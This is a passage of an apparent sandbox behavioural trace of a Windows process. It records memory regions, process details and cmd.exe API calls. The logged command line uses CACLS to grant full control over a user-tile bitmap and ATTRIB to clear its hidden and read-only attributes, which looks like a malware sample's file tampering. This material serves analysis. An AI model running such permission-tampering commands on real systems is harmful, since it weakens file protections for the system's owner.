mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28190 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28191 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = 
"\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28192 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28193 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28194 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28195 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28196 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 28197 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28198 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 621 os_tid = 0xac0 Process: id = "432" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0xa90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\" /E /G %USERNAME%:F /C & ATTRIB 
-R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28200 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28201 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28202 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28203 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 28204 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28205 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28206 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28207 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" 
filename = "" Region: id = 28208 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 28209 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28210 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28211 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28212 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28213 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 28214 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 28215 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28216 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28217 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28218 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = 
"\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28219 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28220 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28221 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28222 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28223 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28224 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 28225 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28226 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28227 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28228 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 28229 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 28230 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 28231 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 28232 start_va = 0x500000 end_va = 0x10fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 28233 start_va = 0x1100000 end_va = 0x1262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Region: id = 28234 start_va = 0x1270000 end_va = 0x153efff entry_point = 0x1270000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 622 os_tid = 0xad8 [0191.996] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfac4 | out: lpSystemTimeAsFileTime=0x2cfac4*(dwLowDateTime=0xa756a880, dwHighDateTime=0x1d440a9)) [0191.996] GetCurrentProcessId () returned 0xa90 [0191.996] GetCurrentThreadId () returned 0xad8 [0191.996] GetTickCount () returned 0x369e9 [0191.996] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfabc | out: lpPerformanceCount=0x2cfabc*=24878520292) returned 1 [0191.997] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0191.997] __set_app_type (_Type=0x1) [0191.997] __p__fmode () returned 0x76b331f4 [0191.997] __p__commode () returned 0x76b331fc [0191.997] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0191.997] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, 
_Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0191.997] GetCurrentThreadId () returned 0xad8 [0191.997] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xad8) returned 0x38 [0191.997] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0191.997] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0191.997] SetThreadUILanguage (LangId=0x0) returned 0x409 [0191.997] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0191.997] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfa54 | out: phkResult=0x2cfa54*=0x0) returned 0x2 [0191.997] VirtualQuery (in: lpAddress=0x2cfa8b, lpBuffer=0x2cfa24, dwLength=0x1c | out: lpBuffer=0x2cfa24*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0191.997] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfa24, dwLength=0x1c | out: lpBuffer=0x2cfa24*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0191.997] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfa24, dwLength=0x1c | out: lpBuffer=0x2cfa24*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0191.997] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfa24, dwLength=0x1c | out: lpBuffer=0x2cfa24*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0191.998] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfa24, dwLength=0x1c | out: lpBuffer=0x2cfa24*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, 
Protect=0x4, Type=0x40000)) returned 0x1c [0191.998] GetConsoleOutputCP () returned 0x1b5 [0191.998] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0191.998] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0191.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.998] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0191.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.998] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0191.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.998] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0191.998] _get_osfhandle (_FileHandle=0) returned 0x3 [0191.998] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0191.999] _get_osfhandle (_FileHandle=0) returned 0x3 [0191.999] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0191.999] GetEnvironmentStringsW () returned 0xe0308* [0191.999] FreeEnvironmentStringsW (penv=0xe0308) returned 1 [0191.999] GetEnvironmentStringsW () returned 0xe0308* [0191.999] FreeEnvironmentStringsW (penv=0xe0308) returned 1 [0191.999] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce9c4 | out: phkResult=0x2ce9c4*=0x40) returned 0x0 [0191.999] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x0, lpData=0x2ce9d0*=0xb8, lpcbData=0x2ce9c8*=0x1000) returned 0x2 [0191.999] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x4, lpData=0x2ce9d0*=0x1, lpcbData=0x2ce9c8*=0x4) returned 0x0 [0191.999] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce9cc, 
lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x0, lpData=0x2ce9d0*=0x1, lpcbData=0x2ce9c8*=0x1000) returned 0x2 [0191.999] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x4, lpData=0x2ce9d0*=0x0, lpcbData=0x2ce9c8*=0x4) returned 0x0 [0191.999] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x4, lpData=0x2ce9d0*=0x40, lpcbData=0x2ce9c8*=0x4) returned 0x0 [0191.999] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x4, lpData=0x2ce9d0*=0x40, lpcbData=0x2ce9c8*=0x4) returned 0x0 [0191.999] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x0, lpData=0x2ce9d0*=0x40, lpcbData=0x2ce9c8*=0x1000) returned 0x2 [0192.000] RegCloseKey (hKey=0x40) returned 0x0 [0192.000] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce9c4 | out: phkResult=0x2ce9c4*=0x40) returned 0x0 [0192.000] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x0, lpData=0x2ce9d0*=0x40, lpcbData=0x2ce9c8*=0x1000) returned 0x2 [0192.000] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x4, lpData=0x2ce9d0*=0x1, lpcbData=0x2ce9c8*=0x4) returned 0x0 [0192.000] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x0, 
lpData=0x2ce9d0*=0x1, lpcbData=0x2ce9c8*=0x1000) returned 0x2 [0192.000] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x4, lpData=0x2ce9d0*=0x0, lpcbData=0x2ce9c8*=0x4) returned 0x0 [0192.000] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x4, lpData=0x2ce9d0*=0x9, lpcbData=0x2ce9c8*=0x4) returned 0x0 [0192.000] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x4, lpData=0x2ce9d0*=0x9, lpcbData=0x2ce9c8*=0x4) returned 0x0 [0192.000] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x0, lpData=0x2ce9d0*=0x9, lpcbData=0x2ce9c8*=0x1000) returned 0x2 [0192.000] RegCloseKey (hKey=0x40) returned 0x0 [0192.000] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639a [0192.000] srand (_Seed=0x5b88639a) [0192.000] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\"" [0192.000] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\"" [0192.000] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.000] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xe1a68, 
nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0192.001] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0192.001] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0192.001] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0192.001] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0192.001] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0192.001] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0192.001] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0192.001] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0192.001] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0192.001] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0192.001] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0192.001] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0192.001] GetEnvironmentStringsW () returned 0xe2458* [0192.001] FreeEnvironmentStringsW (penv=0xe2458) returned 1 [0192.001] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.001] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0192.001] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0192.001] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0192.001] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0192.001] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") 
returned 8 [0192.001] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0192.001] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0192.001] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0192.001] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0192.001] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf790 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.001] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf790, lpFilePart=0x2cf78c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf78c*="Desktop") returned 0x18 [0192.001] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0192.002] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf50c | out: lpFindFileData=0x2cf50c) returned 0xe0ae8 [0192.002] FindClose (in: hFindFile=0xe0ae8 | out: hFindFile=0xe0ae8) returned 1 [0192.002] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf50c | out: lpFindFileData=0x2cf50c) returned 0xe0ae8 [0192.002] FindClose (in: hFindFile=0xe0ae8 | out: hFindFile=0xe0ae8) returned 1 [0192.002] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf50c | out: lpFindFileData=0x2cf50c) returned 0xe0ae8 [0192.002] FindClose (in: hFindFile=0xe0ae8 | out: hFindFile=0xe0ae8) returned 1 [0192.002] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0192.002] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0192.002] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0192.002] GetEnvironmentStringsW () returned 0xe0308* [0192.002] FreeEnvironmentStringsW (penv=0xe0308) returned 1 [0192.002] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.003] GetConsoleOutputCP () returned 0x1b5 [0192.003] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0192.003] GetUserDefaultLCID () returned 0x409 [0192.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0192.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf8d0, cchData=128 | out: lpLCData="0") returned 2 [0192.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf8d0, cchData=128 | out: lpLCData="0") returned 2 [0192.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf8d0, cchData=128 | out: lpLCData="1") returned 2 [0192.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0192.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0192.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0192.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0192.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0192.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0192.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0192.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0192.004] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0192.004] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 
[0192.004] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0192.005] GetConsoleTitleW (in: lpConsoleTitle=0xd09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.005] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0192.005] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0192.005] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0192.005] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0192.006] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0192.006] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0192.006] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0192.006] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0192.006] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0192.006] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0192.006] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0192.006] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0192.009] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0192.009] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0192.009] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0192.009] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0192.009] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0192.009] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0192.009] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0192.011] GetConsoleTitleW (in: lpConsoleTitle=0x2cf564, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.012] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0192.012] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0192.012] _wcsicmp (_String1="CACLS", 
